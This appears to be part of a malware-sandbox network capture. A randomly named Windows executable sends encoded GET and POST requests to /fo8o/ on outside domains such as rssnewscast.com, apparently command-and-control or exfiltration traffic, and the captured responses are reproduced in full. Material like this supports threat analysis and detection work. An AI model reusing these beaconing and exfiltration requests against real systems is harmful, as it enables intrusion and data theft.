                                                                                  Data Ascii: 7BpTBrLp=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhu3TmwMaqQmtLCpTU7xKGKP3HcqvykTiEiH6FDFj5Jcasr+T0YwLQ+63scTh2EfTsYnJxSsL0iqpX0x3KMDZuOQ8XdUDX9ahgBeBsj8nqth/skcqsLuQ+1mOs9JQJNfUA6Mhs29xlshdtuoGzsmXQupmdSO/oGT3Vgd2324a91k53tI0Jws9/rVsbP3tlS+hge466nemxKhCLoFSjUjve6J7CjcLk7CFwGpXz+l3cB7friBjuR5Zuy3du3b5vDDVuXEvyLtum9Es/4byXUgFcim6jhKS68fuBAb47Mmsz7dA6jsQTzKMUjGSoJdqV3EzZyCggY0Bh4iPiGAL3NldetnUQVL1Yjr4GYrd7XU6TDj35BzBTEYpMolA5ZCcT4SWFA+bUtmDJlg30J55XkZSmCbX/qwbKM9Ka3+Tj/fgA+CRtRd/gpkHDrHTYGV8DkPdFiQFphPsb/FQ2S01B9N4/U0wPnJa2KS/+NUJwcmEDWFod/UQ1ELvm0gWWXefqzZHNV2caLnfrPufUZ0QkAEwkca/x02C50CIJi85NeItp2if3s2ZW0DGDO6oFier+nhjfA6mRuoue9nqL80pZwh+2SvcEPDIpTOX9Qmo4DfC+GxeMxoEVI26LQf43JpeSoIFqGOSe/2pX3pW0KFN8k/ZwesIb1LpAuRxDE4pdXGAuUuHfs9ixlfN9YpWSzabXEqJUVTJ+CsUb2SRay3eaJPw51205OfbfzEr+yDbNQuHYeYtlEw9B+fGz7kDEnk7C9ElJC5kAHGhuhCBKHHyQhFMehTadkXcDDEgIRZeaF+VaKnQwNxi2spf1vuWNMkale/2RQ [TRUNCATED]


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.44981185.159.66.93805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:12:43.356072903 CET506OUTGET /fo8o/?7BpTBrLp=qL3nKp+YSjoaTomnOzyxpXPFUBhLgkHGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKFgJSPFkq5dbaCOx4WcoETVBbNsEZyvIPzk=&3vjHf=mRWd HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.magmadokum.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Nov 25, 2024 18:13:44.783057928 CET194INHTTP/1.0 504 Gateway Time-out
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.44993791.195.240.94805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:13:50.260495901 CET782OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.rssnewscast.com
                                                                                  Origin: http://www.rssnewscast.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 205
                                                                                  Referer: http://www.rssnewscast.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 57 2f 30 4f 35 68 55 50 58 53 72 57 2b 48 41 41 67 71 54 52 6e 45 64 72 65 38 43 58 47 36 77 51 38 50 36 48 62 41 42 6c 4f 4c 58 79 36 76 68 69 4b 58 52 70 69 39 36 54 66 55 62 67 30 62 74 76 71 77 54 4c 6d 76 78 47 2b 35 30 31 68 58 36 4f 4d 6c 71 59 38 42 31 44 57 54 59 4b 41 6c 2f 30 49 45 41 66 6f 68 73 4c 30 56 6c 4a 66 58 39 55 41 2b 4d 6b 55 6c 31 54 53 70 31 59 54 43 7a 54 5a 7a 77 6c 33 62 53 4a 6b 45 46 73 6b 36 4b 5a 6b 37 44 38 70 76 46 46 63 4e 4d 51 30 41 59 42 79 74 58 32 74 6a 4b 75 55 42 44 76 36 51 5a 4a 63 54 72 68 51 67 3d 3d
                                                                                  Data Ascii: 7BpTBrLp=81L18xe3ynKwW/0O5hUPXSrW+HAAgqTRnEdre8CXG6wQ8P6HbABlOLXy6vhiKXRpi96TfUbg0btvqwTLmvxG+501hX6OMlqY8B1DWTYKAl/0IEAfohsL0VlJfX9UA+MkUl1TSp1YTCzTZzwl3bSJkEFsk6KZk7D8pvFFcNMQ0AYBytX2tjKuUBDv6QZJcTrhQg==
                                                                                  Nov 25, 2024 18:13:51.656143904 CET707INHTTP/1.1 405 Not Allowed
                                                                                  date: Mon, 25 Nov 2024 17:13:51 GMT
                                                                                  content-type: text/html
                                                                                  content-length: 556
                                                                                  server: Parking/1.0
                                                                                  connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.44994491.195.240.94805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:13:52.920407057 CET802OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.rssnewscast.com
                                                                                  Origin: http://www.rssnewscast.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 225
                                                                                  Referer: http://www.rssnewscast.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 6e 63 6e 58 51 39 52 51 57 6f 4c 68 64 68 6d 61 57 52 71 4e 62 73 30 53 75 50 4c 32 79 62 34 51 38 3d
                                                                                  Data Ascii: 7BpTBrLp=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBncnXQ9RQWoLhdhmaWRqNbs0SuPL2yb4Q8=
                                                                                  Nov 25, 2024 18:13:54.241307974 CET707INHTTP/1.1 405 Not Allowed
                                                                                  date: Mon, 25 Nov 2024 17:13:54 GMT
                                                                                  content-type: text/html
                                                                                  content-length: 556
                                                                                  server: Parking/1.0
                                                                                  connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  11192.168.2.44995091.195.240.94805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:13:55.572906017 CET10884OUTPOST /fo8o/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Host: www.rssnewscast.com
                                                                                  Origin: http://www.rssnewscast.com
                                                                                  Cache-Control: no-cache
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 10305
                                                                                  Referer: http://www.rssnewscast.com/fo8o/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Data Raw: 37 42 70 54 42 72 4c 70 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 45 42 31 63 4c 75 6d 78 6a 67 59 41 33 54 30 33 6f 6d 56 6a 6d 6f 4b 79 67 5a 33 61 75 4a 31 66 71 45 79 69 50 6e 5a 53 4f 6d 6d 77 4e 56 51 65 68 4f 31 37 46 72 4f 37 79 4c 69 6c 5a 7a 4c 42 67 59 42 57 70 6b 47 69 6b 79 6e 4c 70 48 68 2f 7a 38 56 70 48 30 31 5a 43 30 31 41 4f 61 46 67 41 43 78 48 4b 39 42 72 38 6c 68 59 4a 54 48 2b 63 51 75 54 50 63 73 77 44 4f 61 77 57 72 65 57 4c 5a 52 4f 62 34 4f 51 4b 44 67 58 4f 70 41 7a 79 72 4d 76 4e 36 69 72 51 71 46 6a 42 68 48 [TRUNCATED]
                                                                                  Data Ascii: 7BpTBrLp=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iEB1cLumxjgYA3T03omVjmoKygZ3auJ1fqEyiPnZSOmmwNVQehO17FrO7yLilZzLBgYBWpkGikynLpHh/z8VpH01ZC01AOaFgACxHK9Br8lhYJTH+cQuTPcswDOawWreWLZROb4OQKDgXOpAzyrMvN6irQqFjBhHrUdG+IfBSNHSw7v+5bGEfkwDUsG9V5WGoC8+lR/xvv5niBHs5YxnNEvaYLO5HaaXzr9Yoi2eNK/mdKdDN+RzeKqs47wiqJPC1ch3USWoPC2f24K9QCdu1AgunazsdP+QpazQx7ROXqz+lwJKNZe1kvu/mxYEQfuN9kDrDcltTEHs/QZJEUzYvBM6bQMuPz1dVQDMpPWMz/pduf5vOWC2xUc3fv3IBc7OeUD7MIk0bf9Gbm+VO95HMSMAUe3tB+KdjVkVILNTrcl4P4HGW2E+u48IR+g1ays+RI/C1NBPJwVSCGAYSflKEdDQBKYWPtT2CERNvS+q2+Z7hUDmlvZrTzNm2Xa5KVKa1Co/3jN8MoOr7PfQ9Ia5yGc9dX0kFiKjsKUxE/Vp034fjrgGf9Mkg85IeCp+cob6ky3EsKMYZRr5JOnBPv4sN4v9yE4ndesPT8b8SoR6UgELJDvJDVi/IhvwyqS2mqOgKwAIreImiSDx0GiMs4qDzJw5y0zfSaRYkLSbz1s7AuiTEa1VmruK0xGZNeu6oOxQ587MegUgAtQ8J0kU9gVp6LCofjZX6p/d/Sn2hXihM9v1sm4iR2/t0BqhfxFWHV9Cy56ml/sLPWr4/1az18opf8DsZa1q68AlxVyJil3gJlvL/2Qi+kje9jUQzWqR8g3SLA [TRUNCATED]
                                                                                  Nov 25, 2024 18:13:56.863779068 CET707INHTTP/1.1 405 Not Allowed
                                                                                  date: Mon, 25 Nov 2024 17:13:56 GMT
                                                                                  content-type: text/html
                                                                                  content-length: 556
                                                                                  server: Parking/1.0
                                                                                  connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  12192.168.2.44995791.195.240.94805580C:\Program Files (x86)\LUxYvSGVTjrBTAoanwJNXanNlOYkcqslwbsAPMntaLoIUJgatDRDlNWzEFptzmoQ\AQvzsYASIFuMivlIGfCCjBw.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 25, 2024 18:13:58.228084087 CET507OUTGET /fo8o/?7BpTBrLp=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&3vjHf=mRWd HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                  Accept-Language: en-US,en
                                                                                  Host: www.rssnewscast.com
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                  Nov 25, 2024 18:13:59.633307934 CET1236INHTTP/1.1 200 OK
                                                                                  date: Mon, 25 Nov 2024 17:13:59 GMT
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  transfer-encoding: chunked
                                                                                  vary: Accept-Encoding
                                                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  pragma: no-cache
                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_E2CmXdOitfIqV53eGn37q2CzqLTjQW4+k8M2S7e6ag9WuHQHNbq4G7XXxaxwvGhffwelcB0VSUoIg1kmxHqnow==
                                                                                  last-modified: Mon, 25 Nov 2024 17:13:59 GMT
                                                                                  x-cache-miss-from: parking-7ffff5845f-5wfp4
                                                                                  server: Parking/1.0
                                                                                  connection: close
                                                                                  Data Raw: 35 42 34 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 45 32 43 6d 58 64 4f 69 74 66 49 71 56 35 33 65 47 6e 33 37 71 32 43 7a 71 4c 54 6a 51 57 34 2b 6b 38 4d 32 53 37 65 36 61 67 39 57 75 48 51 48 4e 62 71 34 47 37 58 58 78 61 78 77 76 47 68 66 66 77 65 6c 63 42 30 56 53 55 6f 49 67 31 6b 6d 78 48 71 6e 6f 77 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 [TRUNCATED]
                                                                                  Data Ascii: 5B40<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_E2CmXdOitfIqV53eGn37q2CzqLTjQW4+k8M2S7e6ag9WuHQHNbq4G7XXxaxwvGhffwelcB0VSUoIg1kmxHqnow==><head><meta charset="utf-8"><title>rssnewscast.com&nbsp;-&nbsp;rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informat
                                                                                  Nov 25, 2024 18:13:59.633322954 CET1236INData Raw: 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20
                                                                                  Data Ascii: ion youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedopa
                                                                                  Nov 25, 2024 18:13:59.633342028 CET1236INData Raw: 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d 30 2e 35 65 6d 7d
                                                                                  Data Ascii: ght:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,te
                                                                                  Nov 25, 2024 18:13:59.633363962 CET1236INData Raw: 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 3a 3a 2d 77 65 62 6b 69 74 2d 66 69 6c 65 2d 75 70 6c 6f 61 64 2d 62 75 74 74 6f 6e 7b 2d 77 65 62 6b
                                                                                  Data Ascii: ebkit-search-decoration{-webkit-appearance:none}::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}details,menu{display:block}summary{display:list-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.a
                                                                                  Nov 25, 2024 18:13:59.633377075 CET1236INData Raw: 67 68 74 3a 38 32 30 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 7b 70 61 64 64 69 6e 67 3a 30 20 30 20 31 2e 36 65 6d 20 30 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 7b
                                                                                  Data Ascii: ght:820px}.two-tier-ads-list{padding:0 0 1.6em 0}.two-tier-ads-list__list-element{list-style:none;padding:10px 0 5px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet_justa
                                                                                  Nov 25, 2024 18:13:59.633387089 CET1236INData Raw: 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 77 65 62 61 72 63 68 69 76 65 2d 62 6c 6f 63 6b 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e
                                                                                  Data Ascii: t-element-link:link,.webarchive-block__list-element-link:visited{text-decoration:none}.webarchive-block__list-element-link:hover,.webarchive-block__list-element-link:active,.webarchive-block__list-element-link:focus{text-decoration:underline}.
                                                                                  Nov 25, 2024 18:13:59.633398056 CET776INData Raw: 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 5f 5f 63 6f 6e 74 65 6e 74
                                                                                  Data Ascii: enter}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#555}.container-contact-us{text-align:center}.container-contact-us__content{display:inline-block}.con
